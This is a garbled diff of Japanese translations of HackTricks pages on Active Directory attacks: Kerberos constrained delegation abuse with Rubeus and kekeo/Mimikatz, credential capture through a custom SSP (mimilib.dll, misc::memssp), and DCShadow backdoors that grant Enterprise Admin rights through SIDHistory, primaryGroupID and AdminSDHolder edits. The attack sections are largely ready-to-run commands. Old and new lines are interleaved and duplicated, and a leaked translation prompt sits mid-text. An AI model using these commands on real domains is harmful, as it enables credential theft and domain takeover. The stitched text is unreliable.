* **ユーザー自身のサービス(**_**S4U2self**_**** サービスアカウントが[TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx)T2A4Dを含む_userAccountControl_値を持っている場合、他のユーザーを代表して自分自身サービスのためにTGSを取得できます。
* **プロキシユーザーのサービス(**_**S4U2proxy**_**** サービスアカウントは、**msDS-AllowedToDelegateTo**に設定されたサービスに対して任意のユーザーのTGSを取得できます。そのためには、まずそのユーザーから自分自身へのTGSが必要ですが、他のTGSを要求する前にS4U2selfを使用してそのTGSを取得できます。
* **ユーザーのためのサービス自身に(**_**S4U2self**_**** **サービスアカウント**が_userAccountControl_の値に[TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D)を含んでいる場合、他のユーザーに代わって自分自身サービスのためのTGSを取得することができます。
* **ユーザーのためのサービスプロキシに**_**S4U2proxy**_**** **サービスアカウント**は、**msDS-AllowedToDelegateTo**に設定されたサービスに任意のユーザーのTGSを取得することができます。これを行うには、まずそのユーザーから自分自身へのTGSが必要ですが、S4U2selfを使用してそのTGSを取得した後、他のTGSを要求することができます。
**注意**: ADで「_アカウントは機密であり、委任できません_」とマークされている場合、そのユーザーをなりすますことはできません。
**注記**ユーザーがADで「_アカウントは機密であり委任できない_」とマークされている場合、そのユーザーを**なりすまし**ことは**できません**
これは、サービスのハッシュを**侵害する**と、ユーザーをなりすまして**アクセス**を取得し、**構成されたサービス**(可能な**特権昇格**)にアクセスできることを意味します
これは、サービスのハッシュを**侵害**した場合、ユーザーになりすまして、設定された**サービス**への**アクセス**を取得できることを意味します(可能な**権限昇格**
さらに、ユーザーがなりすますことができるサービスだけでなく、**任意のサービス**にもアクセスできます。なぜなら、SPN要求されるサービス名はチェックされておらず、特権のみがチェックされているからです。したがって、**CIFSサービス**にアクセスできる場合、Rubeusの`/altservice`フラグを使用して**HOSTサービス**にもアクセスできます。
さらに、ユーザーがなりすまし可能なサービスへのアクセスだけでなく、SPN要求されたサービス名がチェックされていないため、任意のサービスへのアクセスも可能です。権限のみがチェックされます。したがって、**CIFSサービス**へのアクセスがある場合、Rubeusの`/altservice`フラグを使用して**HOSTサービス**へのアクセスも可能です。
また、**DC上のLDAPサービスへのアクセス**は、**DCSync**を悪用するために必要です。
また、**DC上のLDAPサービスアクセス**は、**DCSync**を悪用するために必要です。
{% code title="列挙" %}
```bash
@ -40,6 +38,8 @@ Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowed
#ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
```
{% endcode %}
{% code title="TGTの取得" %}
```bash
# The first step is to get a TGT of the service that can impersonate others
@ -62,9 +62,9 @@ tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140
{% endcode %}
{% hint style="warning" %}
TGTチケットまたはRC4またはAES256をシステムではないコンピュータで取得する他の方法があります。プリンターバグと非制約委任、NTLMリレー、およびActive Directory証明書サービスの悪用などです。
**TGTチケットを取得する他の方法**や、コンピュータのSYSTEMでなくても**RC4**や**AES256**を取得する方法があります。例えば、Printer Bugや制約なし委任、NTLMリレー、Active Directory Certificate Serviceの悪用などがあります。
TGTチケットまたはハッシュ化されたチケット)があれば、コンピュータ全体を危険にさらすことなくこの攻撃を実行できます。
**そのTGTチケットまたはハッシュ化されたもの)があれば、コンピュータ全体を侵害することなく、この攻撃を実行できます。**
{% endhint %}
{% code title="Rubeusを使用する" %}
@ -84,7 +84,9 @@ TGTチケットまたはハッシュ化されたチケットがあれば
#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
```
{% code title="kekeo + Mimikatzけけお + ミミカッツ)" %}
{% endcode %}
{% code title="kekeo + Mimikatz" %}
```bash
#Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
@ -97,26 +99,24 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.
```
{% endcode %}
###
### 軽減
* 可能な限りKerberos委任を無効にする
* DA/Adminログインを特定のサービスに限する
* 特権アカウントに対して「アカウントは機密情報であり、委任できません」と設定する。
* 可能な場合はkerberos委任を無効にする
* DA/Adminログインを特定のサービスに限する
* 特権アカウントに対して「アカウントは機密であり委任できない」と設定する。
[**詳細はired.teamを参照してください。**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
[**ired.teamでさらに情報を得る。**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック!</strong></summary>
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手**したいですか?または、**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**しましょう。
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**のGitHubリポジトリ[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを**共有する**。
</details>

View file

@ -1,29 +1,27 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを**共有する**。
</details>
# カスタムSSP
[ここでSSPセキュリティサポートプロバイダとは何かを学びます。](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
自分自身のSSPを作成して、マシンへのアクセスに使用される資格情報を**クリアテキストでキャプチャ**することができます。
[SSPセキュリティサポートプロバイダとは何かこちらで学ぶ。](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
マシンへのアクセスに使用される**クレデンシャル**を**クリアテキスト**で**キャプチャ**するために、独自の**SSP**を作成できます。
### Mimilib
Mimikatzが提供する`mimilib.dll`バイナリを使用できます。**これにより、すべての資格情報がクリアテキストでファイルに記録されます。**\
dllを`C:\Windows\System32\`にドロップします。\
Mimikatzによって提供される`mimilib.dll`バイナリを使用できます。**これは、クリアテキストでのすべてのクレデンシャルをファイル内に記録します。**\
`C:\Windows\System32\`にdllをドロップします。\
既存のLSAセキュリティパッケージのリストを取得します
{% code title="attacker@target" %}
@ -35,38 +33,39 @@ Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\
```
{% endcode %}
セキュリティサポートプロバイダリスト(セキュリティパッケージ)に`mimilib.dll`を追加します:
`mimilib.dll`セキュリティサポートプロバイダリスト(セキュリティパッケージ)に追加します:
```csharp
PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
```
そして、再起動後、すべての資格情報は`C:\Windows\System32\kiwissp.log`に平文で見つけることができます。
以下は、Windowsの強化に関するハッキング技術についてのハッキング書籍の内容です。関連する英語テキストを日本語に翻訳し、まったく同じマークダウンおよびHTML構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名Workspace、aws、gcpなど、'leak'という単語、ペネトレーションテスト、およびマークダウンタグなどの翻訳は行わないでください。また、翻訳とマークダウン構文以外の余分なものは追加しないでください。
---
そして、再起動後には、`C:\Windows\System32\kiwissp.log`に平文の資格情報が見つかります。
### メモリ内
また、Mimikatzを使用して直接メモリにインジェクトすることもできます注意少し不安定で動作しない場合があります
Mimikatzを使用してこれを直接メモリに注入することもできます少し不安定になったり機能しない可能性があることに注意してください
```csharp
privilege::debug
misc::memssp
```
れは再起動では生き残りません。
の操作は再起動後には維持されません。
## 緩和策
イベントID 4657 - `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages` の作成/変更の監査
## 対策
イベントID 4657 - `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages` の作成/変更を監査
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**フォロー**する[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
</details>

View file

@ -1,69 +1,73 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**してください。
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有してください。
</details>
# DCShadow
これは、ADに**新しいドメインコントローラ**を登録し、指定されたオブジェクトに対して**属性**SIDHistory、SPNなどを**ログを残さずに**追加するために使用されます。**DA権限**が必要で、**ルートドメイン**内にいる必要があります。\
間違ったデータを使用すると、かなり醜いログが表示されます
**新しいドメインコントローラ**をADに登録し、指定されたオブジェクトに対して(SIDHistory、SPNsなどの) **属性をプッシュ**します。これは、**変更**に関する**ログ**を残さずに行います。**DA**権限が必要で、**ルートドメイン**内にいる必要があります。\
誤ったデータを使用すると、非常に醜いログが表示されることに注意してください
攻撃を実行するには、2つのmimikatzインスタンスが必要です。そのうちの1つは、SYSTEM特権でRPCサーバーを起動しますここで行いたい変更を指定する必要があります。もう1つのインスタンスは、値を追加するために使用されます:
攻撃を実行するには、2つのmimikatzインスタンスが必要です。1つはSYSTEM権限でRPCサーバーを開始するもの(ここで実行したい変更を指示する必要があります)、もう1つは値をプッシュするために使用されます:
{% code title="mimikatz1RPCサーバー" %}
{% code title="mimikatz1 (RPCサーバー)" %}
```bash
!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"
```
{% code title="mimikatz2プッシュ- DAまたは同等の権限が必要" %}
{% endcode %}
{% code title="mimikatz2プッシュ- DAまたは同様の権限が必要" %}
```bash
lsadump::dcshadow /push
```
{% endcode %}
**注意**mimikatz1セッションでは**`elevate::token`**は機能しません。なぜなら、それはスレッドの特権を昇格させるものであり、プロセスの特権を昇格させる必要があるからです。\
また、"LDAP"オブジェクトを選択することもできます`/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local`
**`elevate::token`** は mimikatz1 セッションでは機能しません。これはスレッドの権限を昇格させるものですが、プロセスの**権限を昇格**させる必要があります。\
また、"LDAP" オブジェクトを選択することもできます: `/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local`
これらの変更を行うためには、DAからまたは次の最小限の権限を持つユーザーから変更をプッシュすることができます
以下の最小限の権限を持つユーザーまたはDAから変更をプッシュできます:
* **ドメインオブジェクト**
* _DS-Install-Replica_(ドメインのレプリカの追加/削除)
* _DS-Replication-Manage-Topology_(レプリケーショントポロジの管理)
* _DS-Replication-Synchronize_(レプリケーションの同期)
* **構成コンテナ**の**サイトオブジェクト**(およびその子):
* _CreateChild and DeleteChild_
* **DCとして登録されているコンピュータのオブジェクト**
* _WriteProperty_Writeではない
* **ターゲットオブジェクト**
* _WriteProperty_Writeではない
* **ドメインオブジェクト**において:
* _DS-Install-Replica_ (ドメイン内でのレプリカの追加/削除)
* _DS-Replication-Manage-Topology_ (レプリケーショントポロジーの管理)
* _DS-Replication-Synchronize_ (レプリケーション同期)
* **Configuration コンテナ**内の**Sites オブジェクト**(およびその子オブジェクト):
* _CreateChild および DeleteChild_
* **DCとして登録されているコンピュータのオブジェクト**:
* _WriteProperty_ (Writeではない)
* **ターゲットオブジェクト**:
* _WriteProperty_ (Writeではない)
[**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1)を使用して、特権のないユーザーにこれらの特権を与えることができますこれにより一部のログが残ります。これはDA特権を持つよりもはるかに制限されたものです。\
`Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` これは、ユーザー名_**student1**_がマシン_**mcorp-student1**_にログインした場合、オブジェクト_**root1user**_に対してDCShadow権限を持つことを意味します。
権限のないユーザーにこれらの権限を与えるために [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) を使用できますこれはいくつかのログを残すことに注意してください。これはDA権限を持つよりもはるかに制限的です。\
えば: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` これは、ユーザー名 _**student1**_ がマシン _**mcorp-student1**_ にログオンしているときに、オブジェクト _**root1user**_ に対するDCShadow権限を持つことを意味します。
## DCShadowを使用してバックドアを作成する
{% code title="SIDHistoryにEnterprise Adminsを設定する" %}
{% code title="ユーザーのSIDHistoryにEnterprise Adminsを設定" %}
```bash
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519
```
{% code title="プライマリグループIDの変更ユーザーをドメイン管理者のメンバーに設定する" %}
{% endcode %}
{% code title="PrimaryGroupIDの変更ユーザーをドメイン管理者のメンバーにする" %}
```bash
lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
```
{% code title="AdminSDHolderのntSecurityDescriptorを変更するユーザーに完全な制御権を与える" %}
{% endcode %}
{% code title="AdminSDHolderのntSecurityDescriptorを変更ユーザーに完全なコントロールを与える" %}
```bash
#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
@ -72,39 +76,37 @@ lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attr
```
{% endcode %}
## シャドウセプション - DCShadowを使用してDCShadowの権限を付与する変更された権限ログなし
## Shadowception - DCShadowを使用してDCShadowの権限を付与する変更された権限ログなし)
次のACEをドメインオブジェクトの末尾にユーザーのSIDとともに追加する必要があります:
次のACEをユーザーのSIDを末尾に追加する必要があります:
* ドメインオブジェクト
* ドメインオブジェクト
* `(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
* `(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)`
* `(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
* 攻撃者のコンピュータオブジェクト`(A;;WP;;;UserSID)`
* ターゲットユーザーオブジェクト`(A;;WP;;;UserSID)`
* 構成コンテナ内のサイトオブジェクト`(A;CI;CCDC;;;UserSID)`
* 攻撃者のコンピュータオブジェクト`(A;;WP;;;UserSID)`
* ターゲットユーザーオブジェクト`(A;;WP;;;UserSID)`
* Configurationコンテナ内のSitesオブジェクトに`(A;CI;CCDC;;;UserSID)`
オブジェクトの現在のACEを取得するには`(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl`
この場合、**複数の変更**を行う必要があるため、**mimikatz1セッション**RPCサーバーでパラメータ**`/stack`を使用して各変更**を行う必要があります。これにより、ローグサーバーでスタックされた変更をすべて実行するために、**`/push`**を1回だけ実行するだけで済みます。
この場合、**複数の変更**を行う必要があることに注意してください。したがって、**mimikatz1セッション**RPCサーバーは、変更を行いたい各パラメータ**`/stack`** を使用します。これにより、ローグサーバーで積み重ねられた変更を一度に**`/push`** するだけで済みます。
[**ired.teamのDCShadowに関する詳細情報**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)
[**ired.teamでDCShadowについての詳細情報。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>をご覧ください!</strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
- [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私を**フォロー**する[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをチェックしてください。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加するか**、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**してください。
* **HackTricks**のGitHubリポジトリ[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。
</details>

View file

@ -2,33 +2,31 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
